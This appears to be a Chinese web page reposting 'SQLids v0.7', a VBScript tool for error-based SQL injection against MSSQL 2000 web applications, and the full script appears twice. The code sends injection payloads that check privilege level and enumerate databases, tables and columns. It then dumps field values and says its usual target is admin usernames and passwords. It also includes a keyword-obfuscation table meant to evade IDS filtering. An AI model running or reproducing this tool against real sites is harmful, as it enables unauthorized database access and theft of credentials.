SQLids.vbs 0.7(最终版,以后改成gui界面的)
是有这个问题的。
第一,应当用正则判断较好。
第二,我用循环加返回结果大于30个长度就退出循环,我相信没有表名和字段名大于30个字母的,但是字段值有可能大于,这个地方解决的不够好。但是一般是用来查后台的管理员的用户名和密码,所以就放弃了。
' Script entry: read the command line and make sure we run under the console host.
set arg=wscript.arguments
' Only cscript is supported; under wscript.exe the script exits immediately.
if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.quit
end if
' No arguments at all: show the usage text and stop.
if arg.count=0 then
usage()
wscript.quit
end if
' Print the banner and the per-mode usage lines (limit / dbname / table / filed / result / search).
' All text is written with wsh.echo; the script's own name is taken from wscript.scriptname.
sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url"
wsh.echo "sqlids v0.7 for mssql2000 with error by lcx"
wsh.echo "以下两个脚本可互相参考"
wsh.echo "//www.jb51.net/article/14172.htm"
wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
wsh.echo "usage:"
wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit"
wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname"
wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table
master"
wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 filed master spt_server_info"
wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 result id master sysinfo"
wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search
pass"
wsh.echo string(79,"*")&vbcrlf
end sub
function gethttppage(path)
' Fetch the raw response body for path and decode it as gb2312 text.
dim raw
raw = getbody(path)
gethttppage = bytestobstr(raw, "gb2312")
end function
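' Escape spaces as %20 and return the result.
' Only the space character is rewritten; every other character passes through unchanged.
' str is taken ByVal so the caller's variable is no longer modified as a side effect
' (the original assigned to the ByRef parameter).
function urlencode(byval str)
urlencode = replace(str, " ", "%20")
end function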
' Send the request with microsoft.xmlhttp and return the raw response body (bytes).
' The part of url before "?" is the POST target; the part after "?" is sent as the POST body.
' Note: "on error resume next" hides every failure (bad URL, connection refused, missing
' "?" making aurl(1) out of range); callers then receive an empty result with no indication why.
function getbody(url)' fetch the page source via xmlhttp; could be changed to cookie or GET submission
on error resume next
aurl=split(url,"?") ' split for POST submission
set retrieval = createobject("microsoft.xmlhttp")
with retrieval
.open "post", aurl(0), false, "", ""
.setrequestheader "content-type", "application/x-www-form-urlencoded"
.setrequestheader "accept-encoding", "gzip, deflate"
.setrequestheader "user-agent", "mozilla/4.0 (compatible; msie 7.0; windows nt 6.0; slcc1; .net clr 2.0.50727; media center pc 5.0; .net clr
3.0.04506; .net clr 1.1.4322)"
.setrequestheader "connection", "keep-alive"
.setrequestheader "cache-control", "no-cache"
.send urlencode(aurl(1)) ' POST submission
getbody = .responsebody
.abort
end with
set retrieval = nothing
end function
function bytestobstr(body, cset)
' Decode a binary body into a string using the charset named by cset, via ADODB.Stream.
dim stm
set stm = createobject("adodb.stream")
with stm
.type = 1          ' adTypeBinary: accept raw bytes
.mode = 3          ' adModeReadWrite
.open
.write body
.position = 0
.type = 2          ' adTypeText: reread the same bytes as text
.charset = cset
bytestobstr = .readtext
.close
end with
set stm = nothing
end function
' Rewrite keywords in value according to the table below (used to evade IDS filtering).
' Table format: entries separated by "|[k]|", each entry "keyword->replacement".
' Entries are applied in table order with a plain, case-sensitive replace; an entry
' without "->" is skipped (ubound(temp) = 1 check). Because replacements are sequential,
' a later entry can also rewrite text produced by an earlier one.
function replacekeyword(value)' bypass IDS filtering
table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%
ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown-
>shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|
[k]|fetch->fe%tch|[k]|next->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]
|sp_->s%p_|[k]|and->a%nd"
dim i, relpacement, temp
relpacement = split(table, "|[k]|")
replacekeyword = value
for i = 0 to ubound(relpacement)
temp = split(relpacement(i), "->")
if ubound(temp) = 1 then replacekeyword = replace(replacekeyword, temp(0), temp(1))
next
end function
' Extract the value quoted in the server's error text: take what follows the first
' "varchar", then the text between the first pair of single quotes after it.
' If "varchar" is absent the input is returned unchanged. If "varchar" is present but
' no single quote follows it, ahtml(1) is out of range and a runtime error is raised.
function result(shtmltemp) ' split the page content on the "varchar" keyword; a regex would be nicer but the author was not familiar with it
ahtml = split(shtmltemp, "varchar")
if(ubound(ahtml) > 0)then
shtmltemp = ahtml(1)
ahtml = split(shtmltemp, "'")
shtmltemp = ahtml(1)
end if
result=shtmltemp
end function
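' Hex-encode strhex for SQL: each character's asc() value in hex followed by "00",
' prefixed with "0x" (e.g. "ab" -> "0x61006200"). The empty string yields "0x".
' The loop index is declared locally; the original used an undeclared i, which
' clobbered the script-level i used by the main loops.
function str2hex(strhex)
dim pos, out
out = ""
for pos = 1 to len(strhex)
out = out & hex(asc(mid(strhex, pos, 1))) & "00"
next
str2hex = "0x" & out
end function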
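' Hex-encode strhex for SQL: each character's asc() value in hex, prefixed with "0x"
' (e.g. "ab" -> "0x6162"). The empty string yields "0x".
' The loop index is declared locally; the original used an undeclared i, which
' clobbered the script-level i used by the main loops.
function str2hextwo(strhex)
dim pos, out
out = ""
for pos = 1 to len(strhex)
out = out & hex(asc(mid(strhex, pos, 1)))
next
str2hextwo = "0x" & out
end function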
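' Remove duplicate tokens from a comma-separated string, keeping the first occurrence
' and the original order. The last token is appended without a trailing comma, every
' other kept token with one (so "a,b,a,c" -> "a,b,c").
' Duplicates are detected by exact, delimiter-bounded comparison; the original used
' instr() on the partial output, so "ab" wrongly suppressed a later "a".
function mover(rstr)
dim i, parts, tok, seen
parts = split(rstr, ",")
seen = ","
for i = 0 to ubound(parts)
tok = parts(i)
' "," & tok & "," can only match a whole token already recorded in seen
if instr(seen, "," & tok & ",") = 0 then
seen = seen & tok & ","
if i = ubound(parts) then
mover = mover & tok
else
mover = mover & tok & ","
end if
end if
next
end function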
' Append the rewritten sql to the script-level url (separated by a space), fetch the
' page, and strip double quotes from the decoded text.
function page(sql)
page=replace(gethttppage(url&" "&replacekeyword(sql)),chr(34),"")
end function
' Main dispatch: arg(0) is the target URL, arg(1) selects the mode.
url=arg(0)
injection =arg(1) ' assigned here but never read elsewhere in this script
'-------------------------------------- the statements below are the injection strings; no quotes are needed
select case arg(1)
case "limit"
' Baseline response; the role checks compare response lengths against it.
body=replace(gethttppage(url),chr(34),"")
' Statements kept separate for easier maintenance: the first is the sa check, the second db_owner
sqlone="and (select is_srvrolemember(0x730079007300610064006d0069006e00))>0--"
sqltwo="and (select is_member(0x640062005f006f0077006e0065007200))>0--"
bodyone=page(sqlone)
bodytwo=page(sqltwo)
wsh.echo "当前信息:"
' NOTE(review): when the sa test matches, the else branch of the next if still prints "public".
if len(body)=len(bodyone) then wsh.echo "sa"
if len(body)=len(bodytwo) and len(body)<>len(bodyone) then
wsh.echo "db_owner"
else
wsh.echo "public"
end if
sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--"
rtemp=split(sqlthtree,"|")
servername=result(page(rtemp(0)))
version=result(page(rtemp(1)))
user=result(page(rtemp(2)))
db_name=result(page(rtemp(3)))
wsh.echo "servername:"&servername
wsh.echo "version:"&version
wsh.echo "user:"& user
wsh.echo "db_name:"& db_name
case "dbname"
i=1
' Loop until the response no longer contains "varchar" (k = 0).
do
sql="and db_name("&i&")>0--" ' database-name probe
body = page(sql)
k=instrrev(body,"varchar", -1, 0)
i=i+1
if k<>0 then
wscript.echo result(body)
else
wsh.echo "========over============"
end if
loop until k=0
case "table"
i=1
' Same loop shape as "dbname": stops when "varchar" disappears from the response.
do
' table-name probe; arg(2) is the database
sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects
where xtype=0x7500))--"
body = page(sql)
k=instrrev(body,"varchar", -1, 0)
i=i+1
if k<>0 then
wscript.echo result(body)
else
wsh.echo "========over============"
end if
loop until k=0
case "filed"
' arg(2) = database, arg(3) = table; first resolve the table's object id, then count its columns.
sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&str2hex(arg(3))&")=0--
"
biaoid=result(page(sqlbiaoid))
biaoid=replace(biaoid,chr(124),"")
sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- "
k=replace(result(page(sqlclounmcnt)),chr(94),"")
wsh.echo "共有列名"&k&"个"
' k is text taken from the response; the for loop coerces it to a number (non-numeric text raises a type mismatch).
for i=1 to k
sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere
id="&biaoid&" order by colid) t order by colid desc)=0--"
wsh.echo result(page(sqlfiled))
next
case "result"
i=1
sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" ' row-count probe
k=result(page(sqlcloum))
k=replace(k,chr(94),"")
wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf
' As in "filed", k comes from the response text and is coerced by the for loop.
for i=1 to k
sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4)
&"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--"
body = page(sqlneirong)
wscript.echo replace(result(body),chr(94),"")
next
case "search"
love=str2hextwo(arg(2))
wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式"
timespend = timer
for i=1 to 10 ' the 10 can be changed as needed
sqlsearch="and (select/* */top/* */1/* */t_name%2bchar(124)%2bc_name/* */from/* */(select/* */top/* */"&i&"/* */object_name(id)/* */as/* */t_name,name/*
*/as/* */c_name/* */from/* */syscolumns/* */where/* */charindex(cast("&love&"/* */as/* */varchar(2000)),name)%3e0/* */and/* */left(name,1)!=0x40/* */order/*
*/by/* */t_name/* */asc)/* */as/* */t/* */order/* */by/* */t_name/* */desc)>0--"
body = page(sqlsearch)
body=result(body)
' Collected as a comma-separated list; mover() drops duplicates before printing.
a=a&body&","
next
timespend = round(timer - timespend,2)
wsh.echo mover(a)
wsh.echo "用时:" & timespend & "秒."
case else
' NOTE(review): the <> tests joined with "or" are always true, so this guard never skips usage().
if arg(1)<>"limit" or arg(1)<>"dbname" or arg(1)<>"search" or arg(1)<>"table" or arg(1)<>"filed" then
wscript.echo "注意参数"
usage()
end if
end select
第一,应当用正则判断较好。
第二,我用循环加返回结果大于30个长度就退出循环,我相信没有表名和字段名大于30个字母的,但是字段值有可能大于,这个地方解决的不够好。但是一般是用来查后台的管理员的用户名和密码,所以就放弃了。
' Script entry: read the command line and make sure we run under the console host.
set arg=wscript.arguments
' Only cscript is supported; under wscript.exe the script exits immediately.
if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.quit
end if
' No arguments at all: show the usage text and stop.
if arg.count=0 then
usage()
wscript.quit
end if
' Print the banner and the per-mode usage lines (limit / dbname / table / filed / result / search).
' All text is written with wsh.echo; the script's own name is taken from wscript.scriptname.
sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url"
wsh.echo "sqlids v0.7 for mssql2000 with error by lcx"
wsh.echo "以下两个脚本可互相参考"
wsh.echo "//www.jb51.net/article/14172.htm"
wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
wsh.echo "usage:"
wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit"
wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname"
wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table
master"
wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 filed master spt_server_info"
wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 result id master sysinfo"
wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search
pass"
wsh.echo string(79,"*")&vbcrlf
end sub
function gethttppage(path)
' Fetch the raw response body for path and decode it as gb2312 text.
dim raw
raw = getbody(path)
gethttppage = bytestobstr(raw, "gb2312")
end function
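' Escape spaces as %20 and return the result.
' Only the space character is rewritten; every other character passes through unchanged.
' str is taken ByVal so the caller's variable is no longer modified as a side effect
' (the original assigned to the ByRef parameter).
function urlencode(byval str)
urlencode = replace(str, " ", "%20")
end function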
' Send the request with microsoft.xmlhttp and return the raw response body (bytes).
' The part of url before "?" is the POST target; the part after "?" is sent as the POST body.
' Note: "on error resume next" hides every failure (bad URL, connection refused, missing
' "?" making aurl(1) out of range); callers then receive an empty result with no indication why.
function getbody(url)' fetch the page source via xmlhttp; could be changed to cookie or GET submission
on error resume next
aurl=split(url,"?") ' split for POST submission
set retrieval = createobject("microsoft.xmlhttp")
with retrieval
.open "post", aurl(0), false, "", ""
.setrequestheader "content-type", "application/x-www-form-urlencoded"
.setrequestheader "accept-encoding", "gzip, deflate"
.setrequestheader "user-agent", "mozilla/4.0 (compatible; msie 7.0; windows nt 6.0; slcc1; .net clr 2.0.50727; media center pc 5.0; .net clr
3.0.04506; .net clr 1.1.4322)"
.setrequestheader "connection", "keep-alive"
.setrequestheader "cache-control", "no-cache"
.send urlencode(aurl(1)) ' POST submission
getbody = .responsebody
.abort
end with
set retrieval = nothing
end function
function bytestobstr(body, cset)
' Decode a binary body into a string using the charset named by cset, via ADODB.Stream.
dim stm
set stm = createobject("adodb.stream")
with stm
.type = 1          ' adTypeBinary: accept raw bytes
.mode = 3          ' adModeReadWrite
.open
.write body
.position = 0
.type = 2          ' adTypeText: reread the same bytes as text
.charset = cset
bytestobstr = .readtext
.close
end with
set stm = nothing
end function
' Rewrite keywords in value according to the table below (used to evade IDS filtering).
' Table format: entries separated by "|[k]|", each entry "keyword->replacement".
' Entries are applied in table order with a plain, case-sensitive replace; an entry
' without "->" is skipped (ubound(temp) = 1 check). Because replacements are sequential,
' a later entry can also rewrite text produced by an earlier one.
function replacekeyword(value)' bypass IDS filtering
table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%
ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown-
>shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|
[k]|fetch->fe%tch|[k]|next->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]
|sp_->s%p_|[k]|and->a%nd"
dim i, relpacement, temp
relpacement = split(table, "|[k]|")
replacekeyword = value
for i = 0 to ubound(relpacement)
temp = split(relpacement(i), "->")
if ubound(temp) = 1 then replacekeyword = replace(replacekeyword, temp(0), temp(1))
next
end function
' Extract the value quoted in the server's error text: take what follows the first
' "varchar", then the text between the first pair of single quotes after it.
' If "varchar" is absent the input is returned unchanged. If "varchar" is present but
' no single quote follows it, ahtml(1) is out of range and a runtime error is raised.
function result(shtmltemp) ' split the page content on the "varchar" keyword; a regex would be nicer but the author was not familiar with it
ahtml = split(shtmltemp, "varchar")
if(ubound(ahtml) > 0)then
shtmltemp = ahtml(1)
ahtml = split(shtmltemp, "'")
shtmltemp = ahtml(1)
end if
result=shtmltemp
end function
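' Hex-encode strhex for SQL: each character's asc() value in hex followed by "00",
' prefixed with "0x" (e.g. "ab" -> "0x61006200"). The empty string yields "0x".
' The loop index is declared locally; the original used an undeclared i, which
' clobbered the script-level i used by the main loops.
function str2hex(strhex)
dim pos, out
out = ""
for pos = 1 to len(strhex)
out = out & hex(asc(mid(strhex, pos, 1))) & "00"
next
str2hex = "0x" & out
end function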
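' Hex-encode strhex for SQL: each character's asc() value in hex, prefixed with "0x"
' (e.g. "ab" -> "0x6162"). The empty string yields "0x".
' The loop index is declared locally; the original used an undeclared i, which
' clobbered the script-level i used by the main loops.
function str2hextwo(strhex)
dim pos, out
out = ""
for pos = 1 to len(strhex)
out = out & hex(asc(mid(strhex, pos, 1)))
next
str2hextwo = "0x" & out
end function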
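' Remove duplicate tokens from a comma-separated string, keeping the first occurrence
' and the original order. The last token is appended without a trailing comma, every
' other kept token with one (so "a,b,a,c" -> "a,b,c").
' Duplicates are detected by exact, delimiter-bounded comparison; the original used
' instr() on the partial output, so "ab" wrongly suppressed a later "a".
function mover(rstr)
dim i, parts, tok, seen
parts = split(rstr, ",")
seen = ","
for i = 0 to ubound(parts)
tok = parts(i)
' "," & tok & "," can only match a whole token already recorded in seen
if instr(seen, "," & tok & ",") = 0 then
seen = seen & tok & ","
if i = ubound(parts) then
mover = mover & tok
else
mover = mover & tok & ","
end if
end if
next
end function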
' Append the rewritten sql to the script-level url (separated by a space), fetch the
' page, and strip double quotes from the decoded text.
function page(sql)
page=replace(gethttppage(url&" "&replacekeyword(sql)),chr(34),"")
end function
' Main dispatch: arg(0) is the target URL, arg(1) selects the mode.
url=arg(0)
injection =arg(1) ' assigned here but never read elsewhere in this script
'-------------------------------------- the statements below are the injection strings; no quotes are needed
select case arg(1)
case "limit"
' Baseline response; the role checks compare response lengths against it.
body=replace(gethttppage(url),chr(34),"")
' Statements kept separate for easier maintenance: the first is the sa check, the second db_owner
sqlone="and (select is_srvrolemember(0x730079007300610064006d0069006e00))>0--"
sqltwo="and (select is_member(0x640062005f006f0077006e0065007200))>0--"
bodyone=page(sqlone)
bodytwo=page(sqltwo)
wsh.echo "当前信息:"
' NOTE(review): when the sa test matches, the else branch of the next if still prints "public".
if len(body)=len(bodyone) then wsh.echo "sa"
if len(body)=len(bodytwo) and len(body)<>len(bodyone) then
wsh.echo "db_owner"
else
wsh.echo "public"
end if
sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--"
rtemp=split(sqlthtree,"|")
servername=result(page(rtemp(0)))
version=result(page(rtemp(1)))
user=result(page(rtemp(2)))
db_name=result(page(rtemp(3)))
wsh.echo "servername:"&servername
wsh.echo "version:"&version
wsh.echo "user:"& user
wsh.echo "db_name:"& db_name
case "dbname"
i=1
' Loop until the response no longer contains "varchar" (k = 0).
do
sql="and db_name("&i&")>0--" ' database-name probe
body = page(sql)
k=instrrev(body,"varchar", -1, 0)
i=i+1
if k<>0 then
wscript.echo result(body)
else
wsh.echo "========over============"
end if
loop until k=0
case "table"
i=1
' Same loop shape as "dbname": stops when "varchar" disappears from the response.
do
' table-name probe; arg(2) is the database
sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects
where xtype=0x7500))--"
body = page(sql)
k=instrrev(body,"varchar", -1, 0)
i=i+1
if k<>0 then
wscript.echo result(body)
else
wsh.echo "========over============"
end if
loop until k=0
case "filed"
' arg(2) = database, arg(3) = table; first resolve the table's object id, then count its columns.
sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&str2hex(arg(3))&")=0--
"
biaoid=result(page(sqlbiaoid))
biaoid=replace(biaoid,chr(124),"")
sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- "
k=replace(result(page(sqlclounmcnt)),chr(94),"")
wsh.echo "共有列名"&k&"个"
' k is text taken from the response; the for loop coerces it to a number (non-numeric text raises a type mismatch).
for i=1 to k
sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere
id="&biaoid&" order by colid) t order by colid desc)=0--"
wsh.echo result(page(sqlfiled))
next
case "result"
i=1
sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" ' row-count probe
k=result(page(sqlcloum))
k=replace(k,chr(94),"")
wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf
' As in "filed", k comes from the response text and is coerced by the for loop.
for i=1 to k
sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4)
&"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--"
body = page(sqlneirong)
wscript.echo replace(result(body),chr(94),"")
next
case "search"
love=str2hextwo(arg(2))
wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式"
timespend = timer
for i=1 to 10 ' the 10 can be changed as needed
sqlsearch="and (select/* */top/* */1/* */t_name%2bchar(124)%2bc_name/* */from/* */(select/* */top/* */"&i&"/* */object_name(id)/* */as/* */t_name,name/*
*/as/* */c_name/* */from/* */syscolumns/* */where/* */charindex(cast("&love&"/* */as/* */varchar(2000)),name)%3e0/* */and/* */left(name,1)!=0x40/* */order/*
*/by/* */t_name/* */asc)/* */as/* */t/* */order/* */by/* */t_name/* */desc)>0--"
body = page(sqlsearch)
body=result(body)
' Collected as a comma-separated list; mover() drops duplicates before printing.
a=a&body&","
next
timespend = round(timer - timespend,2)
wsh.echo mover(a)
wsh.echo "用时:" & timespend & "秒."
case else
' NOTE(review): the <> tests joined with "or" are always true, so this guard never skips usage().
if arg(1)<>"limit" or arg(1)<>"dbname" or arg(1)<>"search" or arg(1)<>"table" or arg(1)<>"filed" then
wscript.echo "注意参数"
usage()
end if
end select